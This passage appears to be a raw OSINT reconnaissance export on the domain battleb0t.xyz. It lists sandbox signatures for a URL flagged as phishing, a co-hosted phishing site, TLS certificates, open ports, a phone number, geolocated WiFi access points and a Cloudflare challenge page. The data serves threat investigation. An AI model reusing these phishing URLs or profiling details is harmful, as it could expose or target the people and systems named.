"; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/jderusse">@jderusse</a>" (Indicator: "dir "; File: "786RITC2.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ckdncxys\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{cb6dd7e7-ed80-11ed-b43f-080027944a9e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "AvenirNextLTPro-Regular_1_.woff" has type "Web Open Font Format CFF length 38024 version 0.0"- [targetUID: N/A]\n "font-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003800]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF48E04C2C232F3230.TMP" has type "data"- Location: [%TEMP%\\~DF48E04C2C232F3230.TMP]- [targetUID: 00000000-00003800]\n "~DFF77628F7BF10B560.TMP" has type "data"- Location: [%TEMP%\\~DFF77628F7BF10B560.TMP]- [targetUID: 00000000-00003800]\n 
"~DF6EABB9BAE595B52D.TMP" has type "data"- Location: [%TEMP%\\~DF6EABB9BAE595B52D.TMP]- [targetUID: 00000000-00003800]\n "~DFDCBC4D5DBDF1DF3E.TMP" has type "data"- Location: [%TEMP%\\~DFDCBC4D5DBDF1DF3E.TMP]- [targetUID: 00000000-00003800]\n "urlref_httpsacmephp.github.io" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "fonts_1_.css" has type "ASCII text"- [targetUID: N/A]\n "app_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._CB6DD7E7-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_CB6DD7E9-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D2AD0B8A-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "SBXI2I91.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SBXI2I91.txt]- [targetUID: 00000000-00002844]\n "CPJIWZZK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CPJIWZZK.txt]- [targetUID: 00000000-00003800]\n "C8FKJFB2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C8FKJFB2.txt]- [targetUID: 00000000-00003800]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "D3WB1LDR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D3WB1LDR.txt]- [targetUID: 00000000-00002844]\n "YI9AAEHI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YI9AAEHI.txt]- [targetUID: 00000000-00003800]\n "N8OPXZSU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N8OPXZSU.txt]- [targetUID: 00000000-00003800]\n "8X4V8G7W.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8X4V8G7W.txt]- [targetUID: 
00000000-00003800]\n "786RITC2.htm" has type "HTML document UTF-8 Unicode text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\786RITC2.htm]- [targetUID: 00000000-00002844]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'n |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:34:6B:03) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:51:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b9:fb:28:d5:65:83:30:d8:31:05:3e:6a:85:ce:
46:6b:90:7d:d6:90:24:15:f6:22:bc:5f:40:25:72:
5b:e7:43:22:3b:78:ef:22:83:15:af:43:b2:d9:fc:
7d:1a:db:a9:94:2a:ae:eb:dd:dd:89:95:48:86:c7:
3d:d8:4e:b8:52:f3:2e:7f:e0:9b:c5:82:6c:d6:06:
76:85:79:68:7f:b5:68:c5:54:d6:da:9f:0d:42:eb:
eb:78:16:9b:0c:f7:71:92:43:a6:d3:11:c7:27:14:
9e:cd:a5:85:3a:ff:06:6c:60:87:93:13:2c:dc:e9:
44:30:af:d5:55:3a:74:21:37:cc:29:72:2e:4e:f5:
19:19:e6:5d:c6:1c:c3:32:ad:91:33:45:63:c0:b2:
66:88:d4:28:10:ab:35:bf:1b:e2:b6:13:51:c2:fc:
05:07:9b:c6:54:ae:64:1d:50:a0:d8:e2:04:77:50:
9f:40:dd:68:16:1e:0c:0e:81:fa:eb:72:cf:f5:36:
95:d2:67:c3:4f:8e:c3:73:28:01:74:88:7e:c4:4f:
a7:e9:b7:fe:c9:c0:ff:2f:b4:44:b8:a3:61:79:25:
57:1a:c6:7d:41:02:2b:48:a8:75:9f:e9:8a:a8:25:
11:37:66:07:b2:f9:47:e8:c4:ab:b8:9a:0e:7a:bb:
b1:a5:ac:71:ee:85:d1:b6:9f:8c:59:d9:a4:ba:7d:
dc:a9:3f:d4:a9:da:6b:49:93:8d:b7:ed:d0:10:10:
3a:3d:a1:8d:54:88:45:8c:e7:d6:54:5d:8e:e4:5d:
c5:ff:df:b9:f9:a2:ee:ab:9f:c6:3f:4b:06:4d:63:
71:ab:51:6b:7d:38:3e:f3:da:53:ac:5a:a8:0b:4f:
7e:c7:d9:39:5d:36:7e:8b:ff:14:dd:1d:2a:34:03:
79:b2:19:e1:3c:2c:2f:e4:2d:a4:3c:e2:7a:8d:47:
92:45:d5:da:6b:08:e3:22:df:a9:94:5a:8f:90:14:
e5:6c:68:e1:1d:22:8f:1f:c3:5c:b7:24:90:75:5a:
e0:2a:31:19:c8:a9:78:9c:0a:51:95:3b:87:0c:a7:
99:0e:be:1b:bc:21:15:fe:dc:b9:6b:b1:e8:e2:43:
9f:ad:fd:5c:22:a4:20:c6:26:c0:2b:14:2d:ae:44:
dc:33:d8:22:aa:11:57:d7:44:19:1d:80:bb:50:5d:
0f:32:1b:da:79:77:90:80:ce:c3:28:c7:75:3b:c6:
47:f2:e5:98:64:b3:70:12:44:40:b0:21:b9:37:16:
ba:3e:63:8e:8d:d6:ba:d1:98:a1:05:b6:1a:03:b9:
41:51:80:5e:8c:55:bd:f9:47:df:ee:3c:ed:aa:ae:
83:f7:8f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:58:43.278 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:27:BC:99:6E:B9:1F:6A:2A:82:FC:B0:CE:
F5:F8:FD:FE:21:58:D7:7D:FB:27:AC:5C:99:23:65:38:
32:60:00:51:02:21:00:B1:8F:B3:D7:A5:5F:86:FC:18:
A7:BF:90:0C:2A:D9:D9:AE:93:DF:0F:67:76:AC:25:C6:
59:7A:82:A1:B8:87:82
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:58:43.307 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:84:56:FF:69:CD:60:B4:DE:22:F8:A1:
9A:02:89:11:F2:21:CD:A8:DF:20:5A:B5:F1:ED:1C:D2:
C3:DC:97:B9:4B:02:20:7A:A6:80:CD:83:95:32:09:19:
86:6D:57:7E:A9:1E:CD:52:DD:0C:2D:05:7D:5E:5B:20:
62:44:3E:A0:6E:CC:49
Signature Algorithm: sha256WithRSAEncryption
8f:31:80:13:4e:7f:57:8b:2e:1d:55:ff:47:1e:08:9a:4f:f0:
61:cd:76:0c:de:0f:b6:b1:e1:37:7a:3b:31:f7:41:61:6d:26:
3c:f4:3c:91:ce:38:d7:00:d7:14:1b:96:cf:31:d5:a2:f0:ce:
86:08:9d:ae:56:73:2e:35:70:99:f2:a1:d5:f6:c1:25:a1:77:
60:31:12:41:21:3d:c5:3e:a6:f7:ae:19:df:88:d9:d4:98:1c:
d4:ca:ea:97:8d:e9:63:75:bf:4a:82:6f:1a:67:7d:48:0c:0c:
08:ff:f6:95:60:23:b0:46:27:ef:93:ef:4d:f6:79:b3:e9:0a:
ac:f4:de:50:2a:42:3b:da:18:19:58:2d:61:b7:37:20:e9:3b:
f5:7c:74:a7:93:0d:78:f1:3c:2a:a6:84:c3:18:9e:8b:ec:31:
f9:d9:89:02:c1:c6:3c:0b:ac:e1:92:95:ae:5d:e3:0b:08:0d:
f7:ed:0f:4c:8f:0b:db:e5:06:bb:72:05:39:49:bb:58:4f:45:
0e:5b:f1:2e:b2:4b:34:8d:39:4c:05:01:1d:fa:e6:54:8b:64:
f4:28:60:af:2e:58:5a:36:b5:b6:aa:f5:35:93:2e:0a:49:62:
7e:69:d1:23:ae:f4:b5:d9:24:e5:1b:c2:1d:26:18:4d:5e:6b:
93:96:3c:0b
| battleb0t.xyz |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | name@example.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://hassan-gamall.github.io/netflix', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://hassan-gamall.github.io/netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d70_ConnHashTable<3440>_HashTable_Mutex"\n "IsoScope_d70_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d70_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d70_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d70_IE_EarlyTabStart_0xf28_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3440"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': 
|
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | leo (Net ID: 00:01:71:0A:06:4D) | 52.3759, 4.8975 |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:cd:b7:3c:d6:71:f3:4f:d0:0b:1c:3a:89:f9:32:41:9b:99
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:22:44 2022 GMT
Not After : Feb 15 13:22:43 2023 GMT
Subject: CN=www.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
57:48:2A:D8:70:70:AC:E4:0A:F6:8C:02:EF:80:5A:28:2D:B1:3C:AE
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:09:54 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | plesk2.keyubu.net | 87.248.157.100 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.226): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_5.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:54:17 | Software Used | Yes | Censys | 0 | 0 | 4 | 0 | None | CloudFlare CloudFlare Load Balancer | 2606:4700:3037::6815:470e |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2080 | 87.248.157.102 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00xkhaled.github.io]
https://www.openphish.com/feed.txt | 00xkhaled.github.io |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:53:52:1f:22:68:d4:e4:bd:04:c1:ea:37:ae:da:35:a4:38
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:58:43 2023 GMT
Not After : Apr 27 17:58:42 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:58:43.278 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:58:43.307 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ssuhome (Net ID: 00:0C:41:BD:78:F1) | 39.0469, -77.4903 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT3p3p8g9 (Net ID: 84:61:A0:CD:52:30) | 37.751, -97.822 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:8080 | 188.114.97.1 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1C:17:A1) | 52.3759, 4.8975 |
| 2023-05-12 03:11:25 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14806242505', u'local': u'(480) 624-2505'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14806242505', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14806242505 |
| 2023-05-12 02:53:12 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | Cloudflare Inc. Cloudflare | panel.battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : May 4 20:22:49.987 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : May 4 20:22:50.005 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.112): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/kappi_1.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
